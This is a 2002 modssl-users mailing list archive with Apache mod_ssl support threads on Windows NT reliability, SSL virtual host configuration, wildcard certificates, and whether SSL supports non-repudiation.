	by mailgate5.cinetic.de (8.11.2/8.11.2/SuSE Linux 8.11.0-0.4) with SMTP id g44HRPX01369;
	Sat, 4 May 2002 19:27:25 +0200
Date: Sat, 4 May 2002 19:27:25 +0200
Message-Id: <200205041727.g44HRPX01369@mailgate5.cinetic.de>
MIME-Version: 1.0
Organization: http://freemail.web.de/
From: "Johannes Bertscheit" 
To: modssl-users@modssl.org
Cc: jbertscheit@web.de
Subject: Re: Re: WIN32-apache 1.3.x (windows NT) problem of serving concurrent https requests
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id TAA20820
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Johannes Bertscheit" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

"R. DuFresne"  schrieb am 01.12.01:
> The problem you face is a tough one, as you are trying to push a poorly
> designed OS with a well designed aplication to be stable and secure.  The
> windows platform has been repeatedly dogged with issues and will continue
> to be so plauged for a long time yet.  Widows is just not up to the task
> at hand, you would be far better off grabbing something much more stable
> and suited to the task at hand, say openbsd, or even linux, which give
> much better bang for the buck, even on cheaper hardware then any of the
> windows variants.  Patches for issues are much faster incoming to deal
> with issues that drop up uner the unix-like OS' then they ever are
> forthcoming for the windows platform, which the mgt of M$ is very
> resistant to admitting to issues, even when faced with extraordinary
> evidence such exist.  IUt has long been our stand here that windows was
> meant for the desktop at best and never yet suited to serving the net.
> 

No question: I would also prefer to develop under LINUX SOO MUCH (!) 
but I have no choice: 
the project is bound to windows NT hosts and I was not able to convince 
the company to take LINUX (or UNIX) - I tried all the arguments as you stated above.
So what I need are other people with the same problem, that they MUST develop under windows NT and have a RELIABLE apache running on such a machine.
Are there any people out there - stating that they have a apache mod_ssl 
running on windows NT RELIABLE ???

johannes


______________________________________________________________________________
All inclusive! 100 MB Speicher, werbefrei, SMS günstiger, Wunschrufnummer, Events, 
Preisvorteile und mehr unter http://club.web.de/?mc=021104

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May  6 09:49:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA00385; Mon, 6 May 2002 09:48:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bull1.bourse.ch id JAA00363; Mon, 6 May 2002 09:47:59 +0200 (MET DST)
Received: (from nobody@localhost)
	by bull1.bourse.ch (8.8.8+Sun/8.8.8) id JAA23081
	for ; Mon, 6 May 2002 09:47:50 +0200 (MET DST)
X-Authentication-Warning: bull1.bourse.ch: nobody set sender to  using -f
Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1)
	id xma023079; Mon, 6 May 02 09:47:42 +0200
Received: from regulus.bourse.ch (regulus [172.20.196.148])
	by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id JAA10886
	for ; Mon, 6 May 2002 09:47:42 +0200 (MET DST)
Received: from bourse.ch (localhost [127.0.0.1])
	by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id JAA25011
	for ; Mon, 6 May 2002 09:47:41 +0200 (MEST)
Message-ID: <3CD6351D.ECD00890@bourse.ch>
Date: Mon, 06 May 2002 09:47:41 +0200
From: Owen Boyle 
X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: help needed for virtualhosting + SSL configuration.
References: <20020504041606.D5CD336F9@sitemail.everyone.net>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Owen Boyle 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Nisarg Rav wrote:
> 
> hello gurus ,
> 
>       I've installed and configured apache-1.3.23 + openssl-0.9.6b + mod_ssl and mod_perl successfully.
>       It is working fine for my main site and self signed ssl certificate.
> 
>       I want to do IP based virtual hosting for more one site and want to serve that site through self signed ssl certificate.
>       so may i get help to configure httpd.conf to full fill my requirement .

No problem. You just need to create IP-based VirtualHosts:

- Remove all "Port" and "BindAddress" directives (they will be replaced
by "Listen").
- set up as follows:

# Original HTTP site
Listen 192.168.1.1:80

DocumentRoot /path/to/original/http
..


# Original SSL site
Listen 192.168.1.1:443

DocumentRoot /path/to/original/ssl
SSLCertificateFile    /path/to/original/cert
SSLCertificateKeyFile /path/to/original/key
..


# Second SSL site
Listen 192.168.1.2:443

DocumentRoot /path/to/second/ssl
SSLCertificateFile    /path/to/second/cert
SSLCertificateKeyFile /path/to/second/key
..


and so on...

Rgds,

Owen Boyle.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May  6 16:32:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA26432; Mon, 6 May 2002 16:31:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from grant.org id QAA26374; Mon, 6 May 2002 16:30:35 +0200 (MET DST)
Received: from splat.grant.org (mgrant@splat.grant.org [213.39.2.177])
	by grant.org (8.11.6/8.11.6) with ESMTP id g46EURQ41467
	for ; Mon, 6 May 2002 10:30:27 -0400 (EDT)
	(envelope-from mgrant@splat.grant.org)
Received: (from mgrant@localhost)
	by splat.grant.org (8.11.6+Sun/8.11.6) id g46EUNF17878;
	Mon, 6 May 2002 16:30:23 +0200 (MEST)
Date: Mon, 6 May 2002 16:30:23 +0200 (MEST)
Message-Id: <200205061430.g46EUNF17878@splat.grant.org>
From: Michael Grant 
To: modssl-users@modssl.org
Subject: virtual hosting and ssl
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Michael Grant 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I've been playing around with the apache and our virtual hosts.  I am
well aware that I could have different certs for each IP address if I
were using IP based virtual hosting but I'm using name based virtual
hosts.

I host a variety of domains which are not at all subdomains of my main 
domain.  What I would like to do is have one cert for all my domains.

I sort of have it working with name based virtual hosting, but in some
cases, I get the following warning in Internet Explorer:

"The name on the security certificate does not match the name of the
site."

It appears that some web browsers, Netscape for example, support a *
as a wild card in the CN.  For example CN=*grant.org.  There's also
some talk on Microsoft's web site of some versions of IE supporting
this too.  Though, apparently not 5.01 running on windows 98 or me. 

The cases seem to be:

1) I generate a cert with CN=grant.org.  No complaints when I connect
to https://grant.org.  Both Netscape & IE complain if I connect to
www.grant.org or any other of my domains.

2) I generate a cert with CN=*grant.org.  No complaints when I connect 
to https://www.grant.org or https://grant.org from Netscape.  IE
complains that the name is incorrect.  I can import the self-signed
cert into both IE's and Netscape's trusted root ca list.

3) I generate a cert with CN=*.  No complaints when I connect to any
of my domains with Netscape, however IE complains that the name is
incorrect.  I can import the self-signed cert into Netscape's trusted
root ca list but NOT IE's.

Can someone tell me if there is a right way to generate a cert that
works with more than one site with the various different browsers out
there? 

Michael Grant
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May  6 16:54:25 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA28091; Mon, 6 May 2002 16:53:46 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from serv id QAA27987; Mon, 6 May 2002 16:52:35 +0200 (MET DST)
X-ITHouse-Forward-Path: 
Received: From nwadm by serv (IT House Mail Server [IT-B0-D45F090A-345080B0]); Mon, 6 May 2002 10:21:09 -0700
Message-ID: <004101c1f50d$83122930$9865fea9@nwadm>
From: "Subscribed" 
To: 
References: <20020504041606.D5CD336F9@sitemail.everyone.net>
Subject: Re: help needed for virtualhosting + SSL configuration.
Date: Mon, 6 May 2002 09:50:42 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Subscribed" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I Just walked down this road.
Make your default site a virtual host, and NameVirtualHosts, make that your
IP address.
Remove documentroot and servername from your "Main" configuration and keep
it only in 
Thats a start, let me know if you have issues from there.
Remember that the first virtual host becomes default when you remove your
current "default" settings.



====================================
"My advice is worth exactly what you paid for it,
and not a penny more."
====================================
----- Original Message -----
From: "Nisarg Rav" 
To: 
Cc: 
Sent: Friday, May 03, 2002 11:16 PM
Subject: help needed for virtualhosting + SSL configuration.


> hello gurus ,
>
>       I've installed and configured apache-1.3.23 + openssl-0.9.6b +
mod_ssl and mod_perl successfully.
>       It is working fine for my main site and self signed ssl certificate.
>
>       I want to do IP based virtual hosting for more one site and want to
serve that site through self signed ssl certificate.
>       so may i get help to configure httpd.conf to full fill my
requirement .
>
> Regards
>
> Nisarg Rav
>
> _____________________________________________________________
> Want a new web-based email account ? ---> http://www.firstlinux.net
>
> _____________________________________________________________
> Promote your group and strengthen ties to your members with
email@yourgroup.org by Everyone.net  http://www.everyone.net/?btn=tag
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May  6 16:55:27 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA28140; Mon, 6 May 2002 16:54:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bull1.bourse.ch id QAA28094; Mon, 6 May 2002 16:53:48 +0200 (MET DST)
Received: (from nobody@localhost)
	by bull1.bourse.ch (8.8.8+Sun/8.8.8) id QAA25763
	for ; Mon, 6 May 2002 16:53:41 +0200 (MET DST)
X-Authentication-Warning: bull1.bourse.ch: nobody set sender to  using -f
Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1)
	id xma025761; Mon, 6 May 02 16:53:36 +0200
Received: from regulus.bourse.ch (regulus [172.20.196.148])
	by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id QAA08111
	for ; Mon, 6 May 2002 16:53:35 +0200 (MET DST)
Received: from bourse.ch (localhost [127.0.0.1])
	by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id QAA01617
	for ; Mon, 6 May 2002 16:53:34 +0200 (MEST)
Message-ID: <3CD698EE.5AF888A@bourse.ch>
Date: Mon, 06 May 2002 16:53:34 +0200
From: Owen Boyle 
X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: virtual hosting and ssl
References: <200205061430.g46EUNF17878@splat.grant.org>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Owen Boyle 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Michael Grant wrote:
> 
> I've been playing around with the apache and our virtual hosts.  I am
> well aware that I could have different certs for each IP address if I
> were using IP based virtual hosting but I'm using name based virtual
> hosts.
> 
> I host a variety of domains which are not at all subdomains of my main
> domain.  What I would like to do is have one cert for all my domains.
> 
> I sort of have it working with name based virtual hosting, but in some
> cases, I get the following warning in Internet Explorer:
> 
> "The name on the security certificate does not match the name of the
> site."

Indeed. There is a fundamental problem with using NBVHs with SSL - it
don't work, see:
 
	http://www.modssl.org/docs/2.8/ssl_faq.html#ToC47
	http://marc.theaimsgroup.com/?l=apache-modssl&m=98559369910170&w=2

YOu can get it "sort of" working if you don't mind that all your VHs
share the same certificate. What happens is:

- an https request for a session comes in on port 443 - that's all
apache gets. Since the session hasn't been established yet, there is no
Host header.
- with no host header, apache has no idea which VH to use (what can it
use to match the ServerName?).
- since apache doesn't know which VH to use, it can't decide which
certificate to send.
- to get out of the loop, apache just selects the first VH on port 443
and send its certificate.
- probably the cert is for a different site so the browser pops a
warning. If the user clicks OK, the browser establishes a session-key,
encrypts its request (this time containing a host header) and sends it
off.
- the server decrypts the request and now finds the Host header. 
- Now apache can decide which VH to use and so serves the correct
content.

But you can't get by the warning because the default cert doesn't match
the requested site.

The only possible non-general "solution" is if the sites are like
www1.acme.com, www2.acme.com and so on. Then you can get a wildcard cert
which is valid for *.acme.com. Even then though, the behaviour is
browser dependent. Before you ask, there is no such thing as a
super-wildcard *.*.com cert...

Rgds,

Owen Boyle.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May  6 17:08:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA29181; Mon, 6 May 2002 17:07:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from acturus0302.miamiint.net id RAA29146; Mon, 6 May 2002 17:06:56 +0200 (MET DST)
Received: from dumbledore (hidden-user@pc3-stoc5-0-cust109.mid.cable.ntl.com [80.4.56.109])
	by acturus0302.miamiint.net (8.11.6/8.8.7) with SMTP id g46F4QQ07184
	for ; Mon, 6 May 2002 15:04:26 GMT
Message-ID: <000801c1f510$2dc43600$0a00000a@dumbledore>
From: "Steve Leach" 
To: 
References: <200205061430.g46EUNF17878@splat.grant.org> <3CD698EE.5AF888A@bourse.ch>
Subject: Re: virtual hosting and ssl
Date: Mon, 6 May 2002 16:10:37 +0100
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Steve Leach" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Owen,

I just followed this thread - thanks for that condensed 'how it works' for
certificates - I picked up two things I did not know, and as they say
knowledge is power :)

I am wondering at the last statement as to whether the limitation lies in
the ability to produce a certificate that could verify all hosted domains,
or whether Apache (or indeed any HTTPS server) could  work with such a
beast?


Best Regards,

Steve Leach
Network Manager
Mi-Int Limited
Eaglescliffe Logistics Centre
Durham Lane
Egglescliffe
URL: http://www.askalix.com
TEL: 01642 356205
e-mail: sleach@askalix.com

----- Original Message -----
From: "Owen Boyle" 
To: 
Sent: Monday, May 06, 2002 3:53 PM
Subject: Re: virtual hosting and ssl


> Michael Grant wrote:
> >
> > I've been playing around with the apache and our virtual hosts.  I am
> > well aware that I could have different certs for each IP address if I
> > were using IP based virtual hosting but I'm using name based virtual
> > hosts.
> >
> > I host a variety of domains which are not at all subdomains of my main
> > domain.  What I would like to do is have one cert for all my domains.
> >
> > I sort of have it working with name based virtual hosting, but in some
> > cases, I get the following warning in Internet Explorer:
> >
> > "The name on the security certificate does not match the name of the
> > site."
>
> Indeed. There is a fundamental problem with using NBVHs with SSL - it
> don't work, see:
>
> http://www.modssl.org/docs/2.8/ssl_faq.html#ToC47
> http://marc.theaimsgroup.com/?l=apache-modssl&m=98559369910170&w=2
>
> YOu can get it "sort of" working if you don't mind that all your VHs
> share the same certificate. What happens is:
>
> - an https request for a session comes in on port 443 - that's all
> apache gets. Since the session hasn't been established yet, there is no
> Host header.
> - with no host header, apache has no idea which VH to use (what can it
> use to match the ServerName?).
> - since apache doesn't know which VH to use, it can't decide which
> certificate to send.
> - to get out of the loop, apache just selects the first VH on port 443
> and send its certificate.
> - probably the cert is for a different site so the browser pops a
> warning. If the user clicks OK, the browser establishes a session-key,
> encrypts its request (this time containing a host header) and sends it
> off.
> - the server decrypts the request and now finds the Host header.
> - Now apache can decide which VH to use and so serves the correct
> content.
>
> But you can't get by the warning because the default cert doesn't match
> the requested site.
>
> The only possible non-general "solution" is if the sites are like
> www1.acme.com, www2.acme.com and so on. Then you can get a wildcard cert
> which is valid for *.acme.com. Even then though, the behaviour is
> browser dependent. Before you ask, there is no such thing as a
> super-wildcard *.*.com cert...
>
> Rgds,
>
> Owen Boyle.
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May  6 17:56:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA02489; Mon, 6 May 2002 17:55:30 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from a2.scoop.co.nz id RAA02467; Mon, 6 May 2002 17:55:10 +0200 (MET DST)
Received: from localhost (localhost [127.0.0.1])
	by a2.scoop.co.nz (8.12.2/8.12.2) with ESMTP id g46Ft8Oc041483
	for ; Tue, 7 May 2002 03:55:08 +1200 (NZST)
	(envelope-from andrew@scoop.co.nz)
Date: Tue, 7 May 2002 03:55:08 +1200 (NZST)
From: Andrew McNaughton 
X-X-Sender: andrew@a2
To: modssl-users@modssl.org
Subject: Repudiability
Message-ID: <20020507034625.S38812-100000@a2>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Andrew McNaughton 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Suppose someone refutes that they have sent information to a Web site
owner, how is the Web site owner to prove that the information was in
fact received and that it was signed with a given key?

To do this, the Web site owner would presumably need to be able to produce
the still-encrypted post as sent by the user, but from a quickish reading
of the mod_ssl reference, I don't see any way to log this information.

Andrew McNaughton

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May  6 18:41:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA06924; Mon, 6 May 2002 18:40:42 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns1.microanswers.net id SAA06867; Mon, 6 May 2002 18:39:44 +0200 (MET DST)
Received: from ws1.theaclgroup.com (microanswers.net [63.230.56.77] (may be forged))
	by ns1.microanswers.net (8.11.0/8.11.0) with ESMTP id g46GQKm26972
	for ; Mon, 6 May 2002 11:26:20 -0500
Message-Id: <5.1.0.14.0.20020506100233.00a440f0@mail.microanswers.net>
X-Sender: andrewl@mail.microanswers.net
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Mon, 06 May 2002 11:38:44 -0500
To: modssl-users@modssl.org
From: Andrew Lietzow 
Subject: Re: virtual hosting and ssl
In-Reply-To: <3CD698EE.5AF888A@bourse.ch>
References: <200205061430.g46EUNF17878@splat.grant.org>
Mime-Version: 1.0
Content-Type: text/html; charset="us-ascii"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Andrew Lietzow 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


While we're on this topic...

Owen Boyle wrote .... on 01.03.26 


"This question comes up so often it ought to be in the .sig of the
list... ", and 

this ends with "Use different port numbers for different SSL
hosts".


I personally don't know what the .sig would mean, but the last comment


intriques me.  


By using different IP ports ... might something like the following
work?

For example:


<VirtualHost
192.168.1.1>

        ServerAdmin
webmaster@acme.com

        ServerName
www.acme.com

        DocumentRoot
/var/www/www.acme.com

</VirtualHost>


<VirtualHost
192.168.1.1:443>

        ServerAdmin
webmaster@acme.com

        ServerName
secure.acme.com

        DocumentRoot
/var/www/secure.acme.com

        SSLCertificateFile
/path/to/original/cert 

        SSLCertificateKeyFile
/path/to/original/key

</VirtualHost>


<VirtualHost
192.168.1.1>

        ServerAdmin
webmaster@acme.com

        ServerName
www.anotherdomain.com

        DocumentRoot
/var/www/www.anotherdomain.com

</VirtualHost>


<VirtualHost
192.168.1.1:745> (or other
unassigned IP Port) 

        ServerAdmin
webmaster@acme.com

        ServerName
secure.anotherdomain.com

        DocumentRoot
/var/www/secure.acme.com

        SSLCertificateFile
/path/to/second/cert 

        SSLCertificateKeyFile
/path/to/second/key


</VirtualHost>


My question is when running Apache 2.0.X, can one 

Listen 443

AND 

Listen 745 

and obtain the intended result?  I am close to trying this but
thought

maybe someone more experienced has already done so and knows

what results I could anticipate. 


Andrew Lietzow

The ACL Group, Inc. 



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May  6 20:14:49 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA12697; Mon, 6 May 2002 20:13:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from marvin-lnx.int.tele.dk id UAA12669; Mon, 6 May 2002 20:12:47 +0200 (MET DST)
Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500)
	id 640A2BD2C; Mon,  6 May 2002 20:13:49 +0200 (CEST)
Date: Mon, 6 May 2002 20:13:49 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Repudiability
Message-ID: <20020506181349.GA27118@marvin-lnx.int.tele.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <20020507034625.S38812-100000@a2>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20020507034625.S38812-100000@a2>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, May 07, 2002 at 03:55:08AM +1200, Andrew McNaughton wrote:
> 
> Suppose someone refutes that they have sent information to a Web site
> owner, how is the Web site owner to prove that the information was in
> fact received and that it was signed with a given key?
> 
> To do this, the Web site owner would presumably need to be able to produce
> the still-encrypted post as sent by the user, but from a quickish reading
> of the mod_ssl reference, I don't see any way to log this information.
> 
The SSL protocol does not have any support for that.

vh

Mads Toftum
-- 
With a rubber duck, one's never alone.
              -- "The Hitchhiker's Guide to the Galaxy"
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May  6 20:15:24 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA12766; Mon, 6 May 2002 20:14:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA12715; Mon, 6 May 2002 20:13:40 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 45DD74CE758; Mon,  6 May 2002 20:13:39 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g46I3aY30117; Mon, 6 May 2002 20:03:36 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id SAA07535; Mon, 6 May 2002 18:51:47 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g46GolT21605
	for ; Mon, 6 May 2002 12:50:48 -0400
Date: Mon, 6 May 2002 12:50:47 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: virtual hosting and ssl
In-Reply-To: <5.1.0.14.0.20020506100233.00a440f0@mail.microanswers.net>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, 6 May 2002, Andrew Lietzow wrote:

> 
>         ServerAdmin webmaster@acme.com
>...
> 
>         ServerAdmin webmaster@acme.com

Change those to 192.168.1.1:80, and you're fine.  Of course you realize
that that means your second ssl vhost will have to be accessed as
https://secure.anotherdomain.com:745/ , right?

--Cliff

--------------------------------------------------------------
   Cliff Woolley
   cliffwoolley@yahoo.com
   Charlottesville, VA




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May  6 22:53:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA23616; Mon, 6 May 2002 22:52:37 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from grant.org id WAA23533; Mon, 6 May 2002 22:51:12 +0200 (MET DST)
Received: from splat.grant.org (mgrant@splat.grant.org [213.39.2.177])
	by grant.org (8.11.6/8.11.6) with ESMTP id g46KKMQ49960
	for ; Mon, 6 May 2002 16:20:23 -0400 (EDT)
	(envelope-from mgrant@splat.grant.org)
Received: (from mgrant@localhost)
	by splat.grant.org (8.11.6+Sun/8.11.6) id g46KKJb18342;
	Mon, 6 May 2002 22:20:19 +0200 (MEST)
Date: Mon, 6 May 2002 22:20:19 +0200 (MEST)
Message-Id: <200205062020.g46KKJb18342@splat.grant.org>
From: Michael Grant 
To: modssl-users@modssl.org
Subject: Re: virtual hosting and ssl
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Michael Grant 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users




> While we're on this topic...
> Owen Boyle wrote .... on 01.03.26 
> 
> "This question comes up so often it ought to be in the .sig of the list... ", and 
> this ends with "Use different port numbers for different SSL hosts".
> 
> I personally don't know what the .sig would mean, but the last comment 
> intriques me.  
> 
> By using different IP ports ... might something like the following work?
> For example:

I have made this work, however there are drawbacks to this solution.

1) you need at least 2 certs, one for the virtual hosting server and
the second one for the client (in our example, server.cert and
acme.com.cert).  If you used self-signed certs, the user is asked
TWICE to accept the cert, one for the server.cert and secondly for the 
acme.com cert.

2) when you contact https://acme.com, what you end up with in the
browser's location is actually "https://acme.com:8443".  If someone
bookmarks this and you rearrange your port numbers, they're screwed.



        ServerAdmin webmaster@acme.com
        ServerName acme.com
	Redirect / https://acme.com:8443
        SSLCertificateFile /path/to/original/server.cert 
        SSLCertificateKeyFile /path/to/original/server.key



        ServerAdmin webmaster@perigee.com
        ServerName perigee.com
	Redirect / https://perigee.com:8444
        SSLCertificateFile /path/to/original/server.cert 
        SSLCertificateKeyFile /path/to/original/server.key




        ServerAdmin webmaster@acme.com
        ServerName acme.com
        DocumentRoot /var/www/acme.com
        SSLCertificateFile /path/to/original/acme.com.cert 
        SSLCertificateKeyFile /path/to/original/acme.com.key



        ServerAdmin webmaster@perigee.com
        ServerName perigee.com
        DocumentRoot /var/www/perigee.com
        SSLCertificateFile /path/to/original/perigee.com.cert 
        SSLCertificateKeyFile /path/to/original/perigee.com.key



By the way, in putting this email together, I actually tried this on
my server (with different names).  One thing I did not get working was 
using this in conjunction with VirtualDocumentRoot like this:

(replace first 2 virtual hosts above with this)

        ServerAdmin webmaster@acme.com
        ServerName server.com
	VirtualDocumentRoot /www/%0
	Redirect /www/acme.com https://acme.com:8443
	Redirect /www/perigee.com https://perigee.com:8444
        SSLCertificateFile /path/to/original/server.cert 
        SSLCertificateKeyFile /path/to/original/server.key


I could never get this to follow the redirects.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May  6 23:27:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA25948; Mon, 6 May 2002 23:26:43 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from grant.org id XAA25861; Mon, 6 May 2002 23:25:07 +0200 (MET DST)
Received: from splat.grant.org (mgrant@splat.grant.org [213.39.2.177])
	by grant.org (8.11.6/8.11.6) with ESMTP id g46LP0Q51475
	for ; Mon, 6 May 2002 17:25:01 -0400 (EDT)
	(envelope-from mgrant@splat.grant.org)
Received: (from mgrant@localhost)
	by splat.grant.org (8.11.6+Sun/8.11.6) id g46LOwN18455;
	Mon, 6 May 2002 23:24:58 +0200 (MEST)
Date: Mon, 6 May 2002 23:24:58 +0200 (MEST)
